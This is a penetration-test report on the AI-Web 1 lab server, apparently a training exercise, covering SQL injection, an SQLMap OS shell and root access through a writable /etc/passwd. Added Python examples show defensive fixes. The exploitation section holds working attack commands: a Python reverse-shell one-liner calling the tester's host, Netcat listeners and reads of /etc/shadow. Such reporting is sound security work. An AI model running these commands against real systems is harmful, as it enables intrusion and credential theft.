
Ai Web Report 1 1

The document summarizes the findings of a penetration test conducted on AI-Web's corporate server. The test uncovered several critical vulnerabilities, including a SQL injection vulnerability in a web application that allowed obtaining low-level shell access. From there, improper permissions on a system file enabled escalating privileges to full administrative access. Recommendations include secure coding practices, input validation, network security devices, and permissions audits.

Uploaded by: Suraj Theekshana

Table of Contents

EXECUTIVE SUMMARY
  SYNOPSIS
  FINDINGS OVERVIEW
  RECOMMENDATIONS
  SEVERITY SCALE
FINAL REPORT
  METHODOLOGY
  INFORMATION GATHERING
  ENUMERATION
  VULNERABILITY ASSESSMENT
  EXPLOITATION
  OTHER ISSUES
  HOUSE CLEANING

SYNOPSIS
ITProTV was recruited to evaluate AI-Web’s security by engaging in a 1-day penetration test that was
conducted on March 4th, 2020. The goal of the “pentest” is to act as a threat-actor by performing
cyber-attacks against AI-Web’s corporate server. This will serve to discover any present vulnerabilities
that could result in a breach and be leveraged to access AI-Web’s sensitive data by a real-world
attacker. All issues discovered by ITProTV were identified and verified through network evaluation,
system vulnerability scanning and assessment, and both automated and manual exploitation (where
applicable) of found vulnerabilities.

FINDINGS OVERVIEW
While conducting the external penetration test, there were several critical vulnerabilities discovered in
the AI-Web network. ITProTV was able to gain full administrative privileges to the AIWEB1 corporate
server. This was possible due to a vulnerable web-application, which led to remote system access,
then full administrative control was gained through improperly set permissions to a critical system file.
A brief technical overview is listed below:

o Target: AIWEB1 – Low-privilege shell was obtained by performing a SQL Injection attack
against AI-Web’s web-app ‘se3reTdir777’ found at URL: http://10.10.10.4/se3reTdir777/ ,
granting ITProTV testers access as the HTTP service account ‘www-data’. Once access
was established, privilege escalation was possible due to the write permissions of
‘www-data’ on the ‘/etc/passwd’ file, allowing the creation of a new administrative user
(‘user1’), after which the testers could issue the command ‘su user1’ and provide the
password ‘password’, giving them full root access.

RECOMMENDATIONS
To increase the security posture of AI-Web, ITProTV recommends the following mitigations and/or
remediations be performed:

o Implement Prepared Statements with Parameterized Queries. Injection attacks remain
the most common attacks leveraged against web applications. One of the most effective
mitigation strategies for preventing SQL Injection attacks is the implementation of
Prepared Statements with Parameterized Queries.
o Implement User Input Whitelisting. Another very useful mitigation against SQL Injection
attacks is to validate the supplied user input. One should never trust that user input is safe
and therefore should be checked for a set of disallowed characters.
o Require Secure Coding Training for Developers. Developers are on the front lines of
security for any organization and should be prepared to be the first line of defense.
Training in secure coding techniques and practices will help ensure that your
organization’s applications are developed using the most secure code possible, thus
reducing your attack-surface and lowering your overall risk.
o Implement Network Security Devices. Putting up a few fences can go a long way to
increasing your security posture and is a key piece of the Defense-in-Depth puzzle. By
adding a Web Application Firewall (WAF), Next-Gen Firewall, and/or Intrusion
Detection/Prevention System, you can significantly increase your ability to stop intruders
from accessing your systems.
o Perform Permissions Audit of System Files. Permissions misconfigurations are a
common occurrence and can be leveraged to gain full administrative access. Performing a
baseline and then scheduled audits of the permissions to system files can ensure those
files and their permissions are following security best-practices. Service accounts should
not be owners of sensitive operating system files that control local user-accounts.

SEVERITY SCALE

CRITICAL Severity Issue: Poses immediate danger to systems, network, and/or data security and
should be addressed as soon as possible. Exploitation requires little to no special knowledge of the
target. Exploitation doesn’t require highly advanced skill, training, or tools.

HIGH Severity Issue: Poses significant danger to systems, network, and/or data security. Exploitation
commonly requires some advanced knowledge, training, skill, and/or tools. Issue(s) should be
addressed promptly.

MEDIUM Severity Issue: Vulnerabilities should be addressed in a timely manner. Exploitation is
usually more difficult to achieve and requires special knowledge or access. Exploitation may also
require social engineering as well as special conditions.

LOW Severity Issue: Danger of exploitation is unlikely as vulnerabilities offer little to no opportunity to
compromise system, network, and/or data security. Can be handled as time permits.

INFORMATIONAL Issue: Meant to increase client’s knowledge. Likely no actual threat.

METHODOLOGY

ITProTV penetration testers employed testing methods that are widely adopted in the cyber security
assessment industry. This includes 5 phases: Information Gathering, Enumeration, Vulnerability
Assessment, Exploitation, and Reporting/Mitigation.

During these phases, both automated and manual audit techniques were used to ensure the best possible results.

INFORMATION GATHERING

ITProTV was given a scope of host(s) from AI-Web that includes the AI-Web corporate server. You can
see the network details of that device listed below:

- Hostname: AIWEB1
- IP Address: 10.10.10.4
- MAC Address: 00:0C:29:87:86:E3

ITProTV testers were able to verify the IP address and connectivity of the AIWEB1 host/server by
connecting to the AI-Web network and performing a ping-sweep of the network which returned the IP
Address of 10.10.10.4 for AIWEB1.

ENUMERATION

ITProTV performed service enumeration to discover information about the services provided by
AIWEB1, which may reveal critical details that could be leveraged to bypass security and gain an initial
foothold into the system.

ITProTV testers began by scanning all ports on AIWEB1 with Nmap to determine which services were
open. *In some cases, some ports may not be listed.

The initial Nmap scan discovered that only TCP port 80 is open on target AIWEB1. Testers then
performed a more focused Nmap scan to gather more detailed information.

The detailed Nmap scan revealed that a ‘robots.txt’ file is being used to hide 2 directories from
search engine crawlers. Browsing this file manually verified the finding.

Further enumeration, both automated and manual, revealed more sensitive data that proved to be
crucial to gaining database and system access.

Directory fuzzing results of the ‘/m3diNf0/’ web directory using GoBuster.

Directory fuzzing revealed nothing immediately useful in the ‘/se3reTdir777/uploads/’ web
directory.

Directory fuzzing results of the ‘/se3reTdir777/’ web directory using GoBuster.

Testers were then able to browse to these web pages to gain more information.

http://10.10.10.4/m3diNf0/info.php

http://10.10.10.4/se3reTdir777/index.php

VULNERABILITY ASSESSMENT

The vulnerability assessment is done in an attempt to verify that a vulnerability exists that may be
exploitable by an attacker. It was at this time that ITProTV testers employed a variety of web
application vulnerability scanners, such as Skipfish and SQLMap, which were successful at
discovering an exploitable vulnerability (SQL Injection). This vulnerability was then leveraged by
testers to gain initial system access.

Vulnerability Exploited: SQL Injection

Vulnerability Explanation: SQL injection attacks occur when a web application does not perform any
validation against the values received from objects like web forms, user input parameters, cookies,
etc., before passing them to SQL queries that are to be executed on a database server. This
facilitates a way for an attacker to manipulate the input so that the data is interpreted as a part of the
code instead of user supplied data.

Vulnerability Mitigation: Use Prepared Statements with Parameterized Queries.

o OWASP Parameterization Cheat Sheet
o OWASP SQL Injection Prevention Cheat Sheet
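The two mitigations recommended in this report (prepared statements with parameterized queries, and allowlist validation of user input), together with the error-based probe behaviour that the Skipfish trace later reports, are shown in the added Python example below. It is not code from the report or from the AIWEB1 application: it uses an in-memory SQLite table with an assumed schema and constructed rows standing in for the ‘user’ table, and the function names are the example's own.

```python
import re
import sqlite3


def make_db():
    """Constructed stand-in for the AIWEB1 'user' table (schema and rows are assumed)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user (id INTEGER PRIMARY KEY, firstName TEXT, lastName TEXT)")
    conn.executemany(
        "INSERT INTO user VALUES (?, ?, ?)",
        [(1, "Alice", "Smith"), (2, "Bob", "Jones"), (3, "Carol", "White")],
    )
    return conn


def lookup_vulnerable(conn, uid):
    """The flaw: the 'uid' form field is glued into the SQL text, so it is parsed as SQL."""
    query = "SELECT id, firstName, lastName FROM user WHERE id = " + uid
    return conn.execute(query).fetchall()


def lookup_parameterized(conn, uid):
    """Prepared statement: 'uid' is bound as a value and can never change the query's structure."""
    query = "SELECT id, firstName, lastName FROM user WHERE id = ?"
    return conn.execute(query, (uid,)).fetchall()


# Allowlist for the only shape a legitimate user id can take: 1 to 10 decimal digits.
UID_ALLOWLIST = re.compile(r"[0-9]{1,10}")


def is_valid_uid(uid):
    """Allowlist check: accept only what a genuine form submission can contain."""
    return UID_ALLOWLIST.fullmatch(uid) is not None


def lookup_validated(conn, uid):
    """Defence in depth: validate first, then still use the prepared statement."""
    if not is_valid_uid(uid):
        raise ValueError("uid must be a positive integer")
    return lookup_parameterized(conn, int(uid))


def raises_sql_error(lookup, conn, uid):
    """True when the lookup fails with a database error for this input. A database error
    surfacing from user input is the signal that error-based scanners such as Skipfish look for."""
    try:
        lookup(conn, uid)
    except sqlite3.OperationalError:
        return True
    return False


if __name__ == "__main__":
    conn = make_db()
    for payload in ("1", "1 OR 1=1", "1'\""):
        vulnerable = ("SQL error" if raises_sql_error(lookup_vulnerable, conn, payload)
                      else lookup_vulnerable(conn, payload))
        print("vulnerable   ", repr(payload), "->", vulnerable)
        print("parameterized", repr(payload), "->", lookup_parameterized(conn, payload))
        print("validated    ", repr(payload), "->",
              lookup_validated(conn, payload) if is_valid_uid(payload) else "rejected")
```

Run stand-alone, the script shows the three behaviours side by side: the concatenated query returns every row for `1 OR 1=1` and throws a syntax error for the `'"` probe, while the parameterized query treats both inputs as a literal that matches nothing and never surfaces a database error; the validated path rejects them before a query is built at all.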

Severity: CRITICAL

Vulnerability Assessment Steps:

ITProTV testers scanned for security vulnerabilities by first utilizing the web-app vulnerability scanning
tool, Skipfish.

root@kali:~/# skipfish -o ./skipfish_report_aiweb1_se3reTdir777 http://10.10.10.4/se3reTdir777/

The results are saved in the given directory path and can then be viewed by opening the generated
‘index.html’ with a web browser of choice.

To see more detail about the issues presented, click on the issue then click on the ‘[ show trace + ]’
link.

From here we can see the data passed by Skipfish to the AIWEB1 web application as well as the
response sent back, which indicates vulnerability to Error-Based SQL Injection attacks.

The Skipfish trace report shows that the scanner sent a request of ‘uid=1'"&Operation=Submit’
and the server returned a SQL syntax error pointing to where the error might have occurred.

It was at this point that testers manually confirmed the vulnerability.

The vulnerability scanner SQLMap was also used to verify the found SQL Injection vulnerability and
enumerate the database name.

root@kali:~# sqlmap -u http://10.10.10.4/se3reTdir777/ --data="uid=1&Operation=Submit" --dbs

ITProTV testers are now ready to move on to the next phase of testing.

EXPLOITATION

In the Exploitation phase, ITProTV testers will attempt to exploit found vulnerabilities within your
operating system, applications, and data. The end goal for the tester is to attempt to penetrate into
the target environment, gaining as much privilege as possible, and avoiding detection while doing so.

All testers will stay within the scope that was determined during pre-engagement activities and
documentation.

Gaining Low-Privilege Shell

The ITProTV testers succeeded in gaining Remote Code Execution (RCE) by leveraging the
discovered SQL Injection vulnerability, chaining together SQLMap, Linux Bash commands, and Python
commands.

Testers begin exploitation by further enumeration of the AIWEB1 MySQL database.

Enumerating TABLE data:

Dumping data for TABLE ‘user’:

Dumping data for TABLE ‘systemUser’:

3 user accounts are discovered with Base64 encoded passwords. The passwords are decoded, and
the credentials are recorded.

1. t00r : FakeUserPassw0rd
2. aiweb1pwn : MyEvilPass_f908sdaf9_sadfasf0sa
3. u3er : N0tThis0neAls0

Low-Privilege Shell Access via SQLMap:

root@kali:~# sqlmap -u http://10.10.10.4/se3reTdir777/ --data="uid=1&Operation=Submit" --os-shell

The ITProTV testers now have verified RCE on AIWEB1 and now will attempt to obtain a fully
interactive TTY shell. This is desired for 2 reasons:

1. The SQLMap shell isn’t always returning command output consistently
2. The SQLMap shell doesn’t work well with commands like cd, sudo, su, etc.

Testers took the following steps to reach this goal…

Testers then checked to see if Python was installed:

Testers then start a listener to catch the incoming connection with Netcat on their Kali Linux system:

root@kali:~# ncat -vnlp 9999

Using the SQLMap shell and Python, testers then execute a new shell connection from AIWEB1 to the
tester’s Kali Linux Netcat listener.

os-shell> python -c "exec(\"import socket, subprocess;s = socket.socket();s.connect(('10.10.10.3',9999))\nwhile 1: proc = subprocess.Popen(s.recv(1024), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE);s.send(proc.stdout.read()+proc.stderr.read())\")"

Connection is successfully made to Kali from AIWEB1. The new shell is much more stable and
consistent, but still isn’t a fully interactive TTY shell. To obtain the desired TTY, one more shell
connection will need to be made.

In a new terminal session, testers start another Netcat listener over TCP port 8888 on their Kali Linux
system…

root@kali:~# ncat -vnlp 8888

…and issue the following Bash one-liner from the previous Python shell terminal session:

Connection is successfully made to new terminal session and Python is used to create fully interactive
TTY shell:

Now that a fully interactive TTY shell session had been established, ITProTV testers began the
process of looking for a way to elevate privileges. Through manual exploration of system files, a
vulnerability was discovered that allowed testers to gain full administrative/root privileges to the
AIWEB1 server.

Gaining full root access:

After checking file permissions for many common system files, testers quickly discovered a permissions
misconfiguration for the ‘/etc/passwd’ file.

Since ITProTV testers had gained access through the ‘www-data’ service account, they found
themselves with ownership and write permissions to the ‘/etc/passwd’ file. This allowed them to
create a new user account entry with root privileges and a password of their choice.

This was accomplished using the following steps.

From terminal in Kali, ITProTV testers created a SHA-512 hashed password of ‘password’:

From terminal in Kali, testers then created a text file containing the required fields for a user account
entry in a standard /etc/passwd file.

This file (user1.passwd) contains all the information to login as ‘user1’ with password of ‘password’.

From terminal in Kali, testers use Python to serve the user1.passwd file with HTTP.

From the shell connection to AIWEB1, testers downloaded the ‘user1.passwd’ file using the ‘curl’
command, saving the file to the ‘/tmp’ directory of AIWEB1.

ITProTV testers were then able to append the contents of the ‘user1.passwd’ file into the
‘/etc/passwd’ file.

At this point, ITProTV testers were able to login with the ‘user1’ account and were granted root
privileges to the AIWEB1 server.
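This escalation rested on two conditions a defender can check for directly: the ownership and mode of the files that control local accounts (the permissions audit recommended earlier in this report) and the presence of a second uid-0 entry in ‘/etc/passwd’. The added Python audit below is not part of the report; the expected modes are assumptions matching a default Debian layout, and the sample ‘/etc/passwd’ lines are constructed, with a placeholder in place of any hash.

```python
import os
import stat

# Account-controlling files and the widest mode each should have (assumed; Debian defaults).
SENSITIVE_FILES = {
    "/etc/passwd": 0o644,
    "/etc/group": 0o644,
    "/etc/shadow": 0o640,
    "/etc/sudoers": 0o440,
}

# Constructed sample lines. The third has the shape of an appended uid-0 entry; the hash is a placeholder.
SAMPLE_PASSWD = [
    "root:x:0:0:root:/root:/bin/bash\n",
    "www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n",
    "user1:$6$PLACEHOLDER$PLACEHOLDER:0:0:user1:/root:/bin/bash\n",
]


def audit_permissions(path, st_uid, st_mode, max_mode):
    """Findings for one file from its stat() fields (passed in so constructed values can be checked)."""
    findings = []
    if st_uid != 0:
        findings.append("%s is owned by uid %d, not root" % (path, st_uid))
    perm = stat.S_IMODE(st_mode)
    if perm & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append("%s is group- or world-writable (%s)" % (path, oct(perm)))
    if perm & ~max_mode:
        findings.append("%s mode %s is wider than expected %s" % (path, oct(perm), oct(max_mode)))
    return findings


def audit_passwd_entries(lines):
    """Flag uid-0 accounts other than root, hashes kept in passwd instead of shadow,
    empty password fields, and malformed lines."""
    findings = []
    for n, raw in enumerate(lines, 1):
        line = raw.rstrip("\n")
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append("line %d: malformed entry with %d fields" % (n, len(fields)))
            continue
        name, pw, uid = fields[0], fields[1], fields[2]
        if uid == "0" and name != "root":
            findings.append("line %d: account %r has uid 0" % (n, name))
        if pw == "":
            findings.append("line %d: account %r has an empty password field" % (n, name))
        elif pw not in ("x", "*", "!", "!!"):
            findings.append("line %d: account %r carries a password hash in /etc/passwd" % (n, name))
    return findings


def audit_live_system():
    """Run both checks against the host this script executes on; missing files are skipped."""
    findings = []
    for path, max_mode in SENSITIVE_FILES.items():
        try:
            st = os.stat(path)
        except OSError:
            continue
        findings.extend(audit_permissions(path, st.st_uid, st.st_mode, max_mode))
    try:
        with open("/etc/passwd") as fh:
            findings.extend(audit_passwd_entries(fh))
    except OSError:
        pass
    return findings


if __name__ == "__main__":
    # The report's misconfiguration expressed as stat fields: /etc/passwd owned by www-data (uid 33).
    for finding in audit_permissions("/etc/passwd", 33, 0o100644, 0o644):
        print("SAMPLE:", finding)
    for finding in audit_passwd_entries(SAMPLE_PASSWD):
        print("SAMPLE:", finding)
    for finding in audit_live_system():
        print("LIVE:", finding)
```

Run from cron or a configuration-management check, `audit_live_system()` gives a baseline to compare against; an owner other than root on ‘/etc/passwd’ or a non-root uid-0 entry is exactly the pair of conditions that turned the ‘www-data’ shell into root in this engagement.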

ITProTV testers then used their root privileges to access privileged files that contain sensitive data.
These were the ‘/root/flag.txt’ and ‘/etc/shadow’ files.

OTHER ISSUES

ITProTV testers were able to login with the ‘aiweb1pwn’ account password discovered in the
enumeration of the MySQL database.

Severity: LOW

ITProTV testers discovered login credentials for the MySQL database which allowed a successful
local login to said database.

Severity: LOW

HOUSE CLEANING

During a penetration testing engagement, tools, files, user accounts, etc., are created on the client’s
system(s) which, if left behind, could compromise the client’s security.

ITProTV is diligent to ensure that no potential security issues are introduced to AI-Web’s environment
through remnants left on their system(s) after the completion of the engagement. AI-Web system(s)
have had all tools, files, user accounts, etc. that were created by ITProTV testers during the
engagement removed.
